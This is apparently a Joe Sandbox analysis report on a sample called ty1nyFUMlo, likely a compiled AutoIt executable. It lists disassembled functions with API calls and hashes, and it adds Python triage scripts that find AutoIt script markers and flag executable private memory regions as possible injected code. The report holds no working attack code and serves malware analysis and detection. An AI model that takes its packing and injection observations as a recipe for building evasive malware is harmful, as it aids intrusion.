                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Name$Path$FileFullLongOpen
                                                                                                                        • String ID: X$`e]
                                                                                                                        • API String ID: 779396738-2761306869
                                                                                                                        • Opcode ID: 233d51a63626955e37975bd671959e772abcd52637bf02909dccb5e526c68677
                                                                                                                        • Instruction ID: 6c7f1b1fc690e06ec670124cc7bb6c773e2ca169bf0c90e93474dc7d2e786c83
                                                                                                                        • Opcode Fuzzy Hash: 233d51a63626955e37975bd671959e772abcd52637bf02909dccb5e526c68677
                                                                                                                        • Instruction Fuzzy Hash: 64218171A002589BDB41DF98D849BEE7FF8BF89305F00405AE405A7241DBB45A898F61
                                                                                                                        APIs
                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00530668
                                                                                                                          • Part of subcall function 005332A4: RaiseException.KERNEL32(?,?,?,0053068A,?,005E1444,?,?,?,?,?,?,0053068A,00511129,005D8738,00511129), ref: 00533304
                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00530685
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                        • String ID: Unknown exception
                                                                                                                        • API String ID: 3476068407-410509341
                                                                                                                        • Opcode ID: 5f046944508990d77bcca195b3eb21cdaeacba7b5e0e1ffc2464641e2347036e
                                                                                                                        • Instruction ID: 330f89fbd2b33b6d71b1ab31fef8c90d072caeb2ce816210f737f1f86866d3d9
                                                                                                                        • Opcode Fuzzy Hash: 5f046944508990d77bcca195b3eb21cdaeacba7b5e0e1ffc2464641e2347036e
                                                                                                                        • Instruction Fuzzy Hash: DEF0C23490030E77CF00B6A8E85AC9E7F7CBE81310F604532B824D65D5EF71EA65CA80
                                                                                                                        APIs
                                                                                                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 0171F825
                                                                                                                        • ExitProcess.KERNEL32(00000000), ref: 0171F844
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1370595821.000000000171E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0171E000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_171e000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$CreateExit
                                                                                                                        • String ID: D
                                                                                                                        • API String ID: 126409537-2746444292
                                                                                                                        • Opcode ID: 0821f884aa5cc6b4c195274ad0b22897ff79d929f6fdf946f6e29fa30509634f
                                                                                                                        • Instruction ID: 7f4db5af244b045c46d3ac367a5aef96f0868f040d9d4857ec1687d80ee7b21c
                                                                                                                        • Opcode Fuzzy Hash: 0821f884aa5cc6b4c195274ad0b22897ff79d929f6fdf946f6e29fa30509634f
                                                                                                                        • Instruction Fuzzy Hash: 09F0127594025CABDB60EFE4CC49FEEB77CBF08701F008508FB0A9A184DB7496488B61
                                                                                                                        APIs
                                                                                                                        • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 0058302F
                                                                                                                        • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00583044
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Temp$FileNamePath
                                                                                                                        • String ID: aut
                                                                                                                        • API String ID: 3285503233-3010740371
                                                                                                                        • Opcode ID: 038fd748eb899c10e404d46cb98af4203e423808cc145bea8e3fd1be1bbd4c8d
                                                                                                                        • Instruction ID: 6349e2c1f7829ac0352a18ac60e74142055a2daec3e7fff74015cc1ae81553e9
                                                                                                                        • Opcode Fuzzy Hash: 038fd748eb899c10e404d46cb98af4203e423808cc145bea8e3fd1be1bbd4c8d
                                                                                                                        • Instruction Fuzzy Hash: 27D05B7550031467DB3097949D0DFC73F6CDB05750F0001927795D2091DAB09544CAD0
APIs
• GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 005982F5
• TerminateProcess.KERNEL32(00000000), ref: 005982FC
• FreeLibrary.KERNEL32(?,?,?,?), ref: 005984DD
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID: Process$CurrentFreeLibraryTerminate
• String ID:
• API String ID: 146820519-0
• Opcode ID: a195adae46b7b2e7bd96e45ea7c4574d97a2f8466c7c307c77b710575aa33940
• Instruction ID: 0d96c532a0a2ee81883e9a0173f347c5bb0cf8102b6e3803287d85da41dbf445
• Opcode Fuzzy Hash: a195adae46b7b2e7bd96e45ea7c4574d97a2f8466c7c307c77b710575aa33940
• Instruction Fuzzy Hash: 80126B71A083019FDB14DF28C484B6ABBE5BF89318F04895DE8998B352DB31ED45CF92
APIs
  • Part of subcall function 00511BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00511BF4
  • Part of subcall function 00511BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00511BFC
  • Part of subcall function 00511BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00511C07
  • Part of subcall function 00511BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00511C12
  • Part of subcall function 00511BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00511C1A
  • Part of subcall function 00511BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00511C22
  • Part of subcall function 00511B4A: RegisterWindowMessageW.USER32(00000004,?,005112C4), ref: 00511BA2
• GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0051136A
• OleInitialize.OLE32 ref: 00511388
• CloseHandle.KERNEL32(00000000,00000000), ref: 005524AB
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
• String ID:
• API String ID: 1986988660-0
• Opcode ID: 8a32f3a6012534e4f96d3bae3026659cd6a5cd936f2d737d661fd558a8251700
• Instruction ID: a2c1be7d9bad3e72d67d319451dd2cef8a1051d32bf9687fd9b9a2537118ac49
• Opcode Fuzzy Hash: 8a32f3a6012534e4f96d3bae3026659cd6a5cd936f2d737d661fd558a8251700
• Instruction Fuzzy Hash: 8F71C1B5905B818ED78CDF79A9C56993EE0FBA9340744416BD08ACF3A1EB304488EF4D
APIs
  • Part of subcall function 00513923: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00513A04
• Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0057C259
• KillTimer.USER32(?,00000001,?,?), ref: 0057C261
• SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0057C270
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID: IconNotifyShell_Timer$Kill
• String ID:
• API String ID: 3500052701-0
• Opcode ID: 323a4ba2c2e87e9a23c0464eedba2a5f51c5e4639491052d88761e9aaa3b46a0
• Instruction ID: 8268c38520dea522e2ad6d0c6ea99744c00fa1bb3e7c6e7c4814fcfdb04259e6
• Opcode Fuzzy Hash: 323a4ba2c2e87e9a23c0464eedba2a5f51c5e4639491052d88761e9aaa3b46a0
• Instruction Fuzzy Hash: 9C31C574904744AFEB22CF64A895BEBBFECAB17304F00449DD2DE97242C7745A88DB51
APIs
• CloseHandle.KERNELBASE(00000000,00000000,?,?,005485CC,?,005D8CC8,0000000C), ref: 00548704
• GetLastError.KERNEL32(?,005485CC,?,005D8CC8,0000000C), ref: 0054870E
• __dosmaperr.LIBCMT ref: 00548739
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID: CloseErrorHandleLast__dosmaperr
• String ID:
• API String ID: 2583163307-0
• Opcode ID: 13746a9286d7fc3804120b1d10a8ee9d0988eada42a7bdc636fafadc96d8caf8
• Instruction ID: ca96c30c1691fcba0cd7422c8e6215f49d8d2d32e340fa7d64285d3245ada209
• Opcode Fuzzy Hash: 13746a9286d7fc3804120b1d10a8ee9d0988eada42a7bdc636fafadc96d8caf8
• Instruction Fuzzy Hash: E0018E33A0426027D6A56B346889BFE2F59BBE277CF3A0519F8148B1D3EEB1CC819150
APIs
• TranslateMessage.USER32(?), ref: 0051DB7B
• DispatchMessageW.USER32(?), ref: 0051DB89
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0051DB9F
• Sleep.KERNEL32(0000000A), ref: 0051DBB1
• TranslateAcceleratorW.USER32(?,?,?), ref: 00561CC9
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID: Message$Translate$AcceleratorDispatchPeekSleep
• String ID:
• API String ID: 3288985973-0
• Opcode ID: 63e18fd78ce78f31ea2fdcd4028c3206ac68d47b68e7d8c617a6442931273816
• Instruction ID: b04c57b5133ee7231b73540fc7dc41ed18e125d81c195027c2f3adf0a976cd47
• Opcode Fuzzy Hash: 63e18fd78ce78f31ea2fdcd4028c3206ac68d47b68e7d8c617a6442931273816
• Instruction Fuzzy Hash: DBF05E306483809BFB34CB608C89FEA7BBCFB95310F104918E64A830C0DB30A488DB29
APIs
• CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,00582CD4,?,?,?,00000004,00000001), ref: 00582FF2
• SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00582CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00583006
• CloseHandle.KERNEL32(00000000,?,00582CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0058300D
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID: File$CloseCreateHandleTime
• String ID:
• API String ID: 3397143404-0
• Opcode ID: f9ecb8f9f3c0960f86251ba74840c755d5c76f292d13602c2309fef65ac29e6c
• Instruction ID: ace23b7b4834e6e9de36bc86a17b135bfa3756152a7ac01cfc0a3ac53ca464b7
• Opcode Fuzzy Hash: f9ecb8f9f3c0960f86251ba74840c755d5c76f292d13602c2309fef65ac29e6c
• Instruction Fuzzy Hash: 14E0863238021077D7312755BC0DF8B3E1CD787F71F104211FB19750D08AA0550593A8
APIs
• __Init_thread_footer.LIBCMT ref: 005217F6
Strings
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID: Init_thread_footer
• String ID: CALL
• API String ID: 1385522511-4196123274
• Opcode ID: 596232a75ffe833d8a43e8daafd8e06d3e7f6006f2ffa7dda6b0ede61bdd494d
• Instruction ID: 6634c6f1f2c92b9a7d328588e81a4e2057efe7602474ce4a2ff8a8cee2b1219c
• Opcode Fuzzy Hash: 596232a75ffe833d8a43e8daafd8e06d3e7f6006f2ffa7dda6b0ede61bdd494d
• Instruction Fuzzy Hash: 9422AB706086529FC714DF14E484A2BBFF1BFA6314F18896DF4868B3A2D731E845CB86
                                                                                                                        APIs
                                                                                                                        • _wcslen.LIBCMT ref: 00586F6B
                                                                                                                          • Part of subcall function 00514ECB: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,005E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00514EFD
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                         • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: LibraryLoad_wcslen
                                                                                                                        • String ID: >>>AUTOIT SCRIPT<<<
                                                                                                                        • API String ID: 3312870042-2806939583
                                                                                                                        • Opcode ID: cce5a9ca205801be6ddf99b3a8ba7b3bfb85fe1f584399604276d7c3fb1578ae
                                                                                                                        • Instruction ID: 741b6fd0abcc939fdf08f7ab529197b2810baf9b9adafbbfbf9ac3598e5f8555
                                                                                                                        • Opcode Fuzzy Hash: cce5a9ca205801be6ddf99b3a8ba7b3bfb85fe1f584399604276d7c3fb1578ae
                                                                                                                        • Instruction Fuzzy Hash: 44B174312082069FDB14FF24C4959AEBBE5BFD8310F14495DF89697261EB30ED85CB92
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                         • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __fread_nolock
                                                                                                                        • String ID: EA06
                                                                                                                        • API String ID: 2638373210-3962188686
                                                                                                                        • Opcode ID: 6d29b7636bec79ad49dde295ce26d1aa55787e4b417f627ad374aa78ca1a67ff
                                                                                                                        • Instruction ID: 89241343d2bcf0af205bc30084046dbc01c5d46a47e02f79d006108566054ae9
                                                                                                                        • Opcode Fuzzy Hash: 6d29b7636bec79ad49dde295ce26d1aa55787e4b417f627ad374aa78ca1a67ff
                                                                                                                        • Instruction Fuzzy Hash: 8301B5729442587EDF28D7A8C85AFAEBFF8AB05301F00455AE592E61C1E5B4E608CB60
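The two functions above are the AutoIt runtime locating its embedded script: one compares against the wide string ">>>AUTOIT SCRIPT<<<" while loading the module with LoadLibraryExW (resource-only load, flag 0x2), the other reads the script blob with __fread_nolock and checks the "EA06" tag. "AU3!EA06" is the full script-resource magic of AutoIt v3 ("AU3!EA05" in older builds). The scanner below is an added triage example, not code from the report or from AutoIt; it finds those markers in a file so the "Binary is likely a compiled AutoIt script file" verdict can be confirmed by hand. The SAMPLE bytes are constructed for the demonstration and are not taken from the analysed sample.

```python
"""Locate the markers that identify a compiled AutoIt v3 executable.

Added example (not part of the Joe Sandbox report or of AutoIt).
The ">>>AUTOIT ...<<<" strings are wide (UTF-16LE) strings inside the
interpreter; the "AU3!EA06" / "AU3!EA05" magic is ASCII and prefixes the
embedded script resource. The SAMPLE buffer at the bottom is constructed.
"""
import re
from dataclasses import dataclass

# Marker name -> byte pattern. Keep both encodings of the script marker:
# the runtime stores it wide, but repacked samples sometimes carry ASCII.
MARKERS = {
    "au3_magic_ea06": b"AU3!EA06",
    "au3_magic_ea05": b"AU3!EA05",
    "autoit_script_w": ">>>AUTOIT SCRIPT<<<".encode("utf-16-le"),
    "autoit_nocmd_w": ">>>AUTOIT NO CMDEXECUTE<<<".encode("utf-16-le"),
    "autoit_script_a": b">>>AUTOIT SCRIPT<<<",
}

# Either resource magic, or the interpreter's own wide marker, is enough
# to tag a file as AutoIt; the NO CMDEXECUTE string alone is weaker.
STRONG = {"au3_magic_ea06", "au3_magic_ea05", "autoit_script_w"}


@dataclass(frozen=True)
class Hit:
    name: str
    offset: int


def find_autoit_markers(data: bytes) -> list[Hit]:
    """Return every marker occurrence in data, ordered by file offset."""
    hits = []
    for name, needle in MARKERS.items():
        for m in re.finditer(re.escape(needle), data):
            hits.append(Hit(name, m.start()))
    return sorted(hits, key=lambda h: h.offset)


def is_probably_autoit(data: bytes) -> bool:
    """True when at least one strong marker is present."""
    names = {h.name for h in find_autoit_markers(data)}
    return bool(names & STRONG)


def scan_file(path: str) -> list[Hit]:
    """Convenience wrapper: scan a file on disk."""
    with open(path, "rb") as f:
        return find_autoit_markers(f.read())


# Constructed sample: a fake MZ header, the interpreter's two wide markers
# separated by filler, then the script-resource magic and opaque filler.
SAMPLE = (
    b"MZ" + b"\x00" * 62
    + ">>>AUTOIT NO CMDEXECUTE<<<".encode("utf-16-le")
    + b"\x90" * 16
    + ">>>AUTOIT SCRIPT<<<".encode("utf-16-le")
    + b"\x00" * 8
    + b"AU3!EA06" + b"\x00" * 8
)

if __name__ == "__main__":
    for h in find_autoit_markers(SAMPLE):
        print(f"{h.offset:#010x}  {h.name}")
    print("autoit:", is_probably_autoit(SAMPLE))
```

Run it against the dropped file as well as the original: the report's "Multi AV Scanner detection for dropped file" and the stub-to-script marker chain are what a second-stage AutoIt wrapper looks like, and the marker offsets tell you where to start carving the script resource.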
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0171F0C0: GetFileAttributesW.KERNELBASE(?), ref: 0171F0CB
                                                                                                                        • CreateDirectoryW.KERNELBASE(?,00000000), ref: 0171F9EB
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1370595821.000000000171E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0171E000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_171e000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AttributesCreateDirectoryFile
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3401506121-0
                                                                                                                        • Opcode ID: e83de68ac299bb71bcbab0c0780beb7698449ad80fb75449cfd5c59fc4997c61
                                                                                                                        • Instruction ID: 9703def226678fc07049de7979405a65e09ca97c6df80162cebca80e939b8b01
                                                                                                                        • Opcode Fuzzy Hash: e83de68ac299bb71bcbab0c0780beb7698449ad80fb75449cfd5c59fc4997c61
                                                                                                                        • Instruction Fuzzy Hash: 46619531A1120897EF14DFB4D844BEEB33AEF58300F109569E60DEB294EB799B48C765
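The function above is the one Joe Sandbox found outside the loaded PE: its dump name carries protection 00000040 and type 00020000, and the source is marked "based on PE: false", whereas every region of ty1nyFUMlo.exe itself is 00000020/00000002/00000004 with type 01000000. Read as Win32 constants, that is a PAGE_EXECUTE_READWRITE, MEM_PRIVATE region at 0171E000 executing file-system code, the footprint of an unpacked or injected stage. The decoder below is an added example, not Joe Sandbox code; the field layout it assumes (fourth field = base, fifth = PAGE_* protection, seventh = MEM_* type, the rest opaque counters) is inferred from the dump names on this page and is an assumption, not documented format. The two input names are copied from the report.

```python
"""Decode Joe Sandbox .sdmp dump names into Win32 memory-region attributes.

Added example, not part of the Joe Sandbox report or tooling. ASSUMED
layout of the dot-separated name, inferred from the values on this page:
  [3] region base (hex)   [4] PAGE_* protection   [6] MEM_* type
Fields 0-2, 5 and 7 are treated as opaque counters.
"""
from dataclasses import dataclass

PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
EXEC_MASK = 0x10 | 0x20 | 0x40 | 0x80
WRITE_MASK = 0x04 | 0x08 | 0x40 | 0x80
MEM_IMAGE = 0x1000000
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", MEM_IMAGE: "MEM_IMAGE"}


@dataclass(frozen=True)
class Region:
    name: str
    base: int
    protect: int
    mem_type: int
    pe_backed: bool

    @property
    def protect_name(self) -> str:
        # Mask off PAGE_GUARD / PAGE_NOCACHE modifiers before the lookup.
        return PAGE_PROTECT.get(self.protect & 0xFF, f"0x{self.protect:x}")

    @property
    def mem_type_name(self) -> str:
        return MEM_TYPE.get(self.mem_type, f"0x{self.mem_type:x}")

    @property
    def executable(self) -> bool:
        return bool(self.protect & EXEC_MASK)

    @property
    def writable(self) -> bool:
        return bool(self.protect & WRITE_MASK)

    @property
    def suspicious(self) -> bool:
        # Executable + writable memory that is neither an image section nor
        # backed by a PE on disk: where unpacked/injected code usually lives.
        return (self.executable and self.writable
                and self.mem_type != MEM_IMAGE and not self.pe_backed)


def parse_sdmp_name(name: str, pe_backed: bool) -> Region:
    """Parse one dump file name; pe_backed is the report's 'based on PE'."""
    stem = name.removesuffix(".sdmp")
    fields = stem.split(".")
    if len(fields) != 8:
        raise ValueError(f"expected 8 dot-separated fields in {name!r}")
    return Region(name, int(fields[3], 16), int(fields[4], 16),
                  int(fields[6], 16), pe_backed)


def flag_suspicious(dumps) -> list[Region]:
    """Return the regions worth pulling first for unpacking/IOC extraction."""
    return [r for r in (parse_sdmp_name(n, pe) for n, pe in dumps) if r.suspicious]


# The two source dumps named in this report (name, based-on-PE flag).
PAGE_DUMPS = [
    ("00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp", True),
    ("00000000.00000002.1370595821.000000000171E000.00000040.00000020.00020000.00000000.sdmp", False),
]

if __name__ == "__main__":
    for n, pe in PAGE_DUMPS:
        r = parse_sdmp_name(n, pe)
        print(f"{r.base:#010x} {r.protect_name:<24} {r.mem_type_name:<12} "
              f"pe={pe} suspicious={r.suspicious}")
```

The same check applied to the "Associated" dump names of the PE shows why they are uninteresting: .text is PAGE_EXECUTE_READ, the data regions are PAGE_READONLY or PAGE_READWRITE, and all are MEM_IMAGE.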
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                         • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
